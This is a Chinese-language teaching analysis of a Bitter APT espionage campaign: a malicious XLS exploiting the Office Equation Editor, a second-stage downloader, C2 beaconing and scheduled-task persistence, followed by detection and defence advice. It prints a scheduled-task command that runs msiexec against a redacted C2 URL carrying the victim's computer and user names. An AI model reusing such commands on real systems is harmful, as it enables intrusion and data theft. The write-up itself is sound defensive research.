APT组织Bitter网络间谍攻击活动实例分析
字数 1976 2025-08-11 17:40:32

APT组织Bitter网络间谍攻击活动实例分析教学文档

一、Bitter组织概述

Bitter(又称T-APT-17、BITTER、蔓灵花)是一个长期活跃的南亚地区APT组织,主要针对中国、巴基斯坦等国家进行攻击活动。该组织具有以下特征:

  • 命名来源:早期使用的特种木马通信数据包头部以"BITTER"作为标识
  • 攻击目标:主要针对政府、军工、能源等关键单位
  • 攻击目的:窃取敏感数据,具有强烈的政治背景
  • 活动历史:长期持续的网络间谍活动

二、攻击活动实例分析

攻击流程总览

本次攻击针对孟加拉国军事机构,采用多阶段攻击策略:

  1. 第一阶段:利用Office公式编辑器漏洞的恶意文档
  2. 第二阶段:投放名为"vc"的恶意样本
  3. 后续阶段:部署远程访问木马(RAT)进行网络间谍活动

第一阶段:诱饵文档攻击

1. 诱饵文档特征

  • 文件名:《Repair of different csoc cstc_ china supplied system - BNS BIJOY.xls》
  • 文件类型:恶意XLS文档
  • 攻击手法:利用Office公式编辑器组件(EQNEDT32.EXE)漏洞

2. 漏洞利用机制

  • 漏洞组件:EQNEDT32.EXE(Office公式编辑器)
  • 漏洞类型:远程代码执行漏洞(如CVE-2018-0798)
  • 触发方式
    • 文档包含函数=EMBED("Equation. 3",")
    • 打开文档时自动调用Equation.3程序
    • 通过Process Monitor可观察到EQNEDT32.EXE进程启动

3. Shellcode分析

  • 嵌入位置:文档中"Equation Native"部分
  • 编码方式:使用0xFF作为XOR密钥进行异或编码
  • 功能分析
    • 解码后可见明显字符串(如urlmon.dll)
    • 包含下载URL:http://***.com/vc/vc
    • 通过URLDownloadToFileA API下载第二阶段payload

4. 第二阶段payload部署

  • 下载路径:C:\$Drw
  • 重命名:fsutil.exe
  • 执行方式:由EQNEDT32.EXE调用explorer.exe启动

第二阶段:恶意样本分析

1. 样本基本信息

  • 文件名:vc
  • 文件类型:可执行文件
  • 创建时间:2022-5-11

2. C&C通信机制

  • 域名解密

    • 样本中加密存储C&C域名
    • 运行时解密出真实域名:m.***.com

  • 信息收集

    • 收集计算机名称和用户名
    • 拼接为请求发送至C&C服务器
    • 示例请求格式:http://***.com/csslogs/vis.php?st=%computername%*%username%

3. 持久化机制

通过创建计划任务实现持久化:

  • 任务名称:AdobeUpdater
  • 执行频率:每15分钟一次
  • 任务命令: 
    schtasks /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c start /min msiexec /i http://***.com/csslogs/vis.php?st=%computername%*%username% /qn /norestart" /f

三、技术要点总结

1. 攻击手法特点

  • 多阶段攻击链设计
  • 利用已知但未修复的Office漏洞
  • 使用诱饵文档进行初始入侵
  • 渐进式payload部署
  • 隐蔽的持久化机制

2. 检测与防御建议

检测指标(IOC)

  • 文件相关

    • 可疑XLS文档名称模式
    • C:$Drw\fsutil.exe路径
    • AdobeUpdater计划任务

  • 网络相关

    • 域名模式:***.com/vc/vc
    • 请求模式:/csslogs/vis.php?st=

防御措施

  1. 漏洞防护

    • 禁用或更新Office公式编辑器组件
    • 及时安装Office安全更新

  2. 行为监控

    • 监控EQNEDT32.EXE异常启动
    • 检测可疑的计划任务创建
    • 监控异常目录下的可执行文件

  3. 网络防护

    • 拦截已知恶意域名
    • 监控异常HTTP请求模式

  4. 安全意识

    • 警惕来源不明的Office文档
    • 培训用户识别社会工程学攻击

四、扩展分析

1. 关联攻击

  • 与Sophos Labs 2019年报告关联:相似的shellcode编码方式(XOR 0xFF)
  • 可能使用相同的maldoc构造器

2. 攻击演进

  • 从早期简单payload投递到多阶段复杂攻击
  • C&C通信机制的隐蔽性增强
  • 持久化手段多样化

3. 溯源分析

  • 南亚地区APT组织特征
  • 政治动机明显
  • 长期针对特定国家和行业

五、研究工具推荐

  1. 静态分析

    • PE工具(查看样本信息)
    • IDA Pro(字符串分析)
    • oledump(Office文档分析)

  2. 动态分析

    • Process Monitor(进程监控)
    • x32dbg + gflags.exe(调试分析)
    • Burpsuite(网络流量分析)

  3. 威胁情报

    • 微步在线等威胁情报平台
    • 公开漏洞数据库(如CVE详情)

本教学文档全面涵盖了Bitter APT组织的攻击实例,从攻击流程到技术细节,并提供了实用的检测防御建议,可作为网络安全研究和防御工作的参考。

APT组织Bitter网络间谍攻击活动实例分析教学文档 一、Bitter组织概述 Bitter(又称T-APT-17、BITTER、蔓灵花)是一个长期活跃的南亚地区APT组织,主要针对中国、巴基斯坦等国家进行攻击活动。该组织具有以下特征: 命名来源 :早期使用的特种木马通信数据包头部以"BITTER"作为标识 攻击目标 :主要针对政府、军工、能源等关键单位 攻击目的 :窃取敏感数据,具有强烈的政治背景 活动历史 :长期持续的网络间谍活动 二、攻击活动实例分析 攻击流程总览 本次攻击针对孟加拉国军事机构,采用多阶段攻击策略: 第一阶段 :利用Office公式编辑器漏洞的恶意文档 第二阶段 :投放名为"vc"的恶意样本 后续阶段 :部署远程访问木马(RAT)进行网络间谍活动 第一阶段:诱饵文档攻击 1. 诱饵文档特征 文件名:《Repair of different csoc cstc_ china supplied system - BNS BIJOY.xls》 文件类型:恶意XLS文档 攻击手法:利用Office公式编辑器组件(EQNEDT32.EXE)漏洞 2. 漏洞利用机制 漏洞组件 :EQNEDT32.EXE(Office公式编辑器) 漏洞类型 :远程代码执行漏洞(如CVE-2018-0798) 触发方式 : 文档包含函数 =EMBED("Equation. 3",") 打开文档时自动调用Equation.3程序 通过Process Monitor可观察到EQNEDT32.EXE进程启动 3. Shellcode分析 嵌入位置 :文档中"Equation Native"部分 编码方式 :使用0xFF作为XOR密钥进行异或编码 功能分析 : 解码后可见明显字符串(如urlmon.dll) 包含下载URL: http://***.com/vc/vc 通过URLDownloadToFileA API下载第二阶段payload 4. 第二阶段payload部署 下载路径: C:\$Drw 重命名:fsutil.exe 执行方式:由EQNEDT32.EXE调用explorer.exe启动 第二阶段:恶意样本分析 1. 样本基本信息 文件名:vc 文件类型:可执行文件 创建时间:2022-5-11 2. C&C通信机制 域名解密 : 样本中加密存储C&C域名 运行时解密出真实域名: m.***.com 信息收集 : 收集计算机名称和用户名 拼接为请求发送至C&C服务器 示例请求格式: http://***.com/csslogs/vis.php?st=%computername%*%username% 3. 持久化机制 通过创建计划任务实现持久化: 任务名称:AdobeUpdater 执行频率:每15分钟一次 任务命令: 三、技术要点总结 1. 攻击手法特点 多阶段攻击链设计 利用已知但未修复的Office漏洞 使用诱饵文档进行初始入侵 渐进式payload部署 隐蔽的持久化机制 2. 检测与防御建议 检测指标(IOC) 文件相关 : 可疑XLS文档名称模式 C:\$Drw\fsutil.exe路径 AdobeUpdater计划任务 网络相关 : 域名模式: ***.com/vc/vc 请求模式: /csslogs/vis.php?st= 防御措施 漏洞防护 : 禁用或更新Office公式编辑器组件 及时安装Office安全更新 行为监控 : 监控EQNEDT32.EXE异常启动 检测可疑的计划任务创建 监控异常目录下的可执行文件 网络防护 : 拦截已知恶意域名 监控异常HTTP请求模式 安全意识 : 警惕来源不明的Office文档 培训用户识别社会工程学攻击 四、扩展分析 1. 关联攻击 与Sophos Labs 2019年报告关联:相似的shellcode编码方式(XOR 0xFF) 可能使用相同的maldoc构造器 2. 攻击演进 从早期简单payload投递到多阶段复杂攻击 C&C通信机制的隐蔽性增强 持久化手段多样化 3. 溯源分析 南亚地区APT组织特征 政治动机明显 长期针对特定国家和行业 五、研究工具推荐 静态分析 : PE工具(查看样本信息) IDA Pro(字符串分析) oledump(Office文档分析) 动态分析 : Process Monitor(进程监控) x32dbg + gflags.exe(调试分析) Burpsuite(网络流量分析) 威胁情报 : 微步在线等威胁情报平台 公开漏洞数据库(如CVE详情) 本教学文档全面涵盖了Bitter APT组织的攻击实例,从攻击流程到技术细节,并提供了实用的检测防御建议,可作为网络安全研究和防御工作的参考。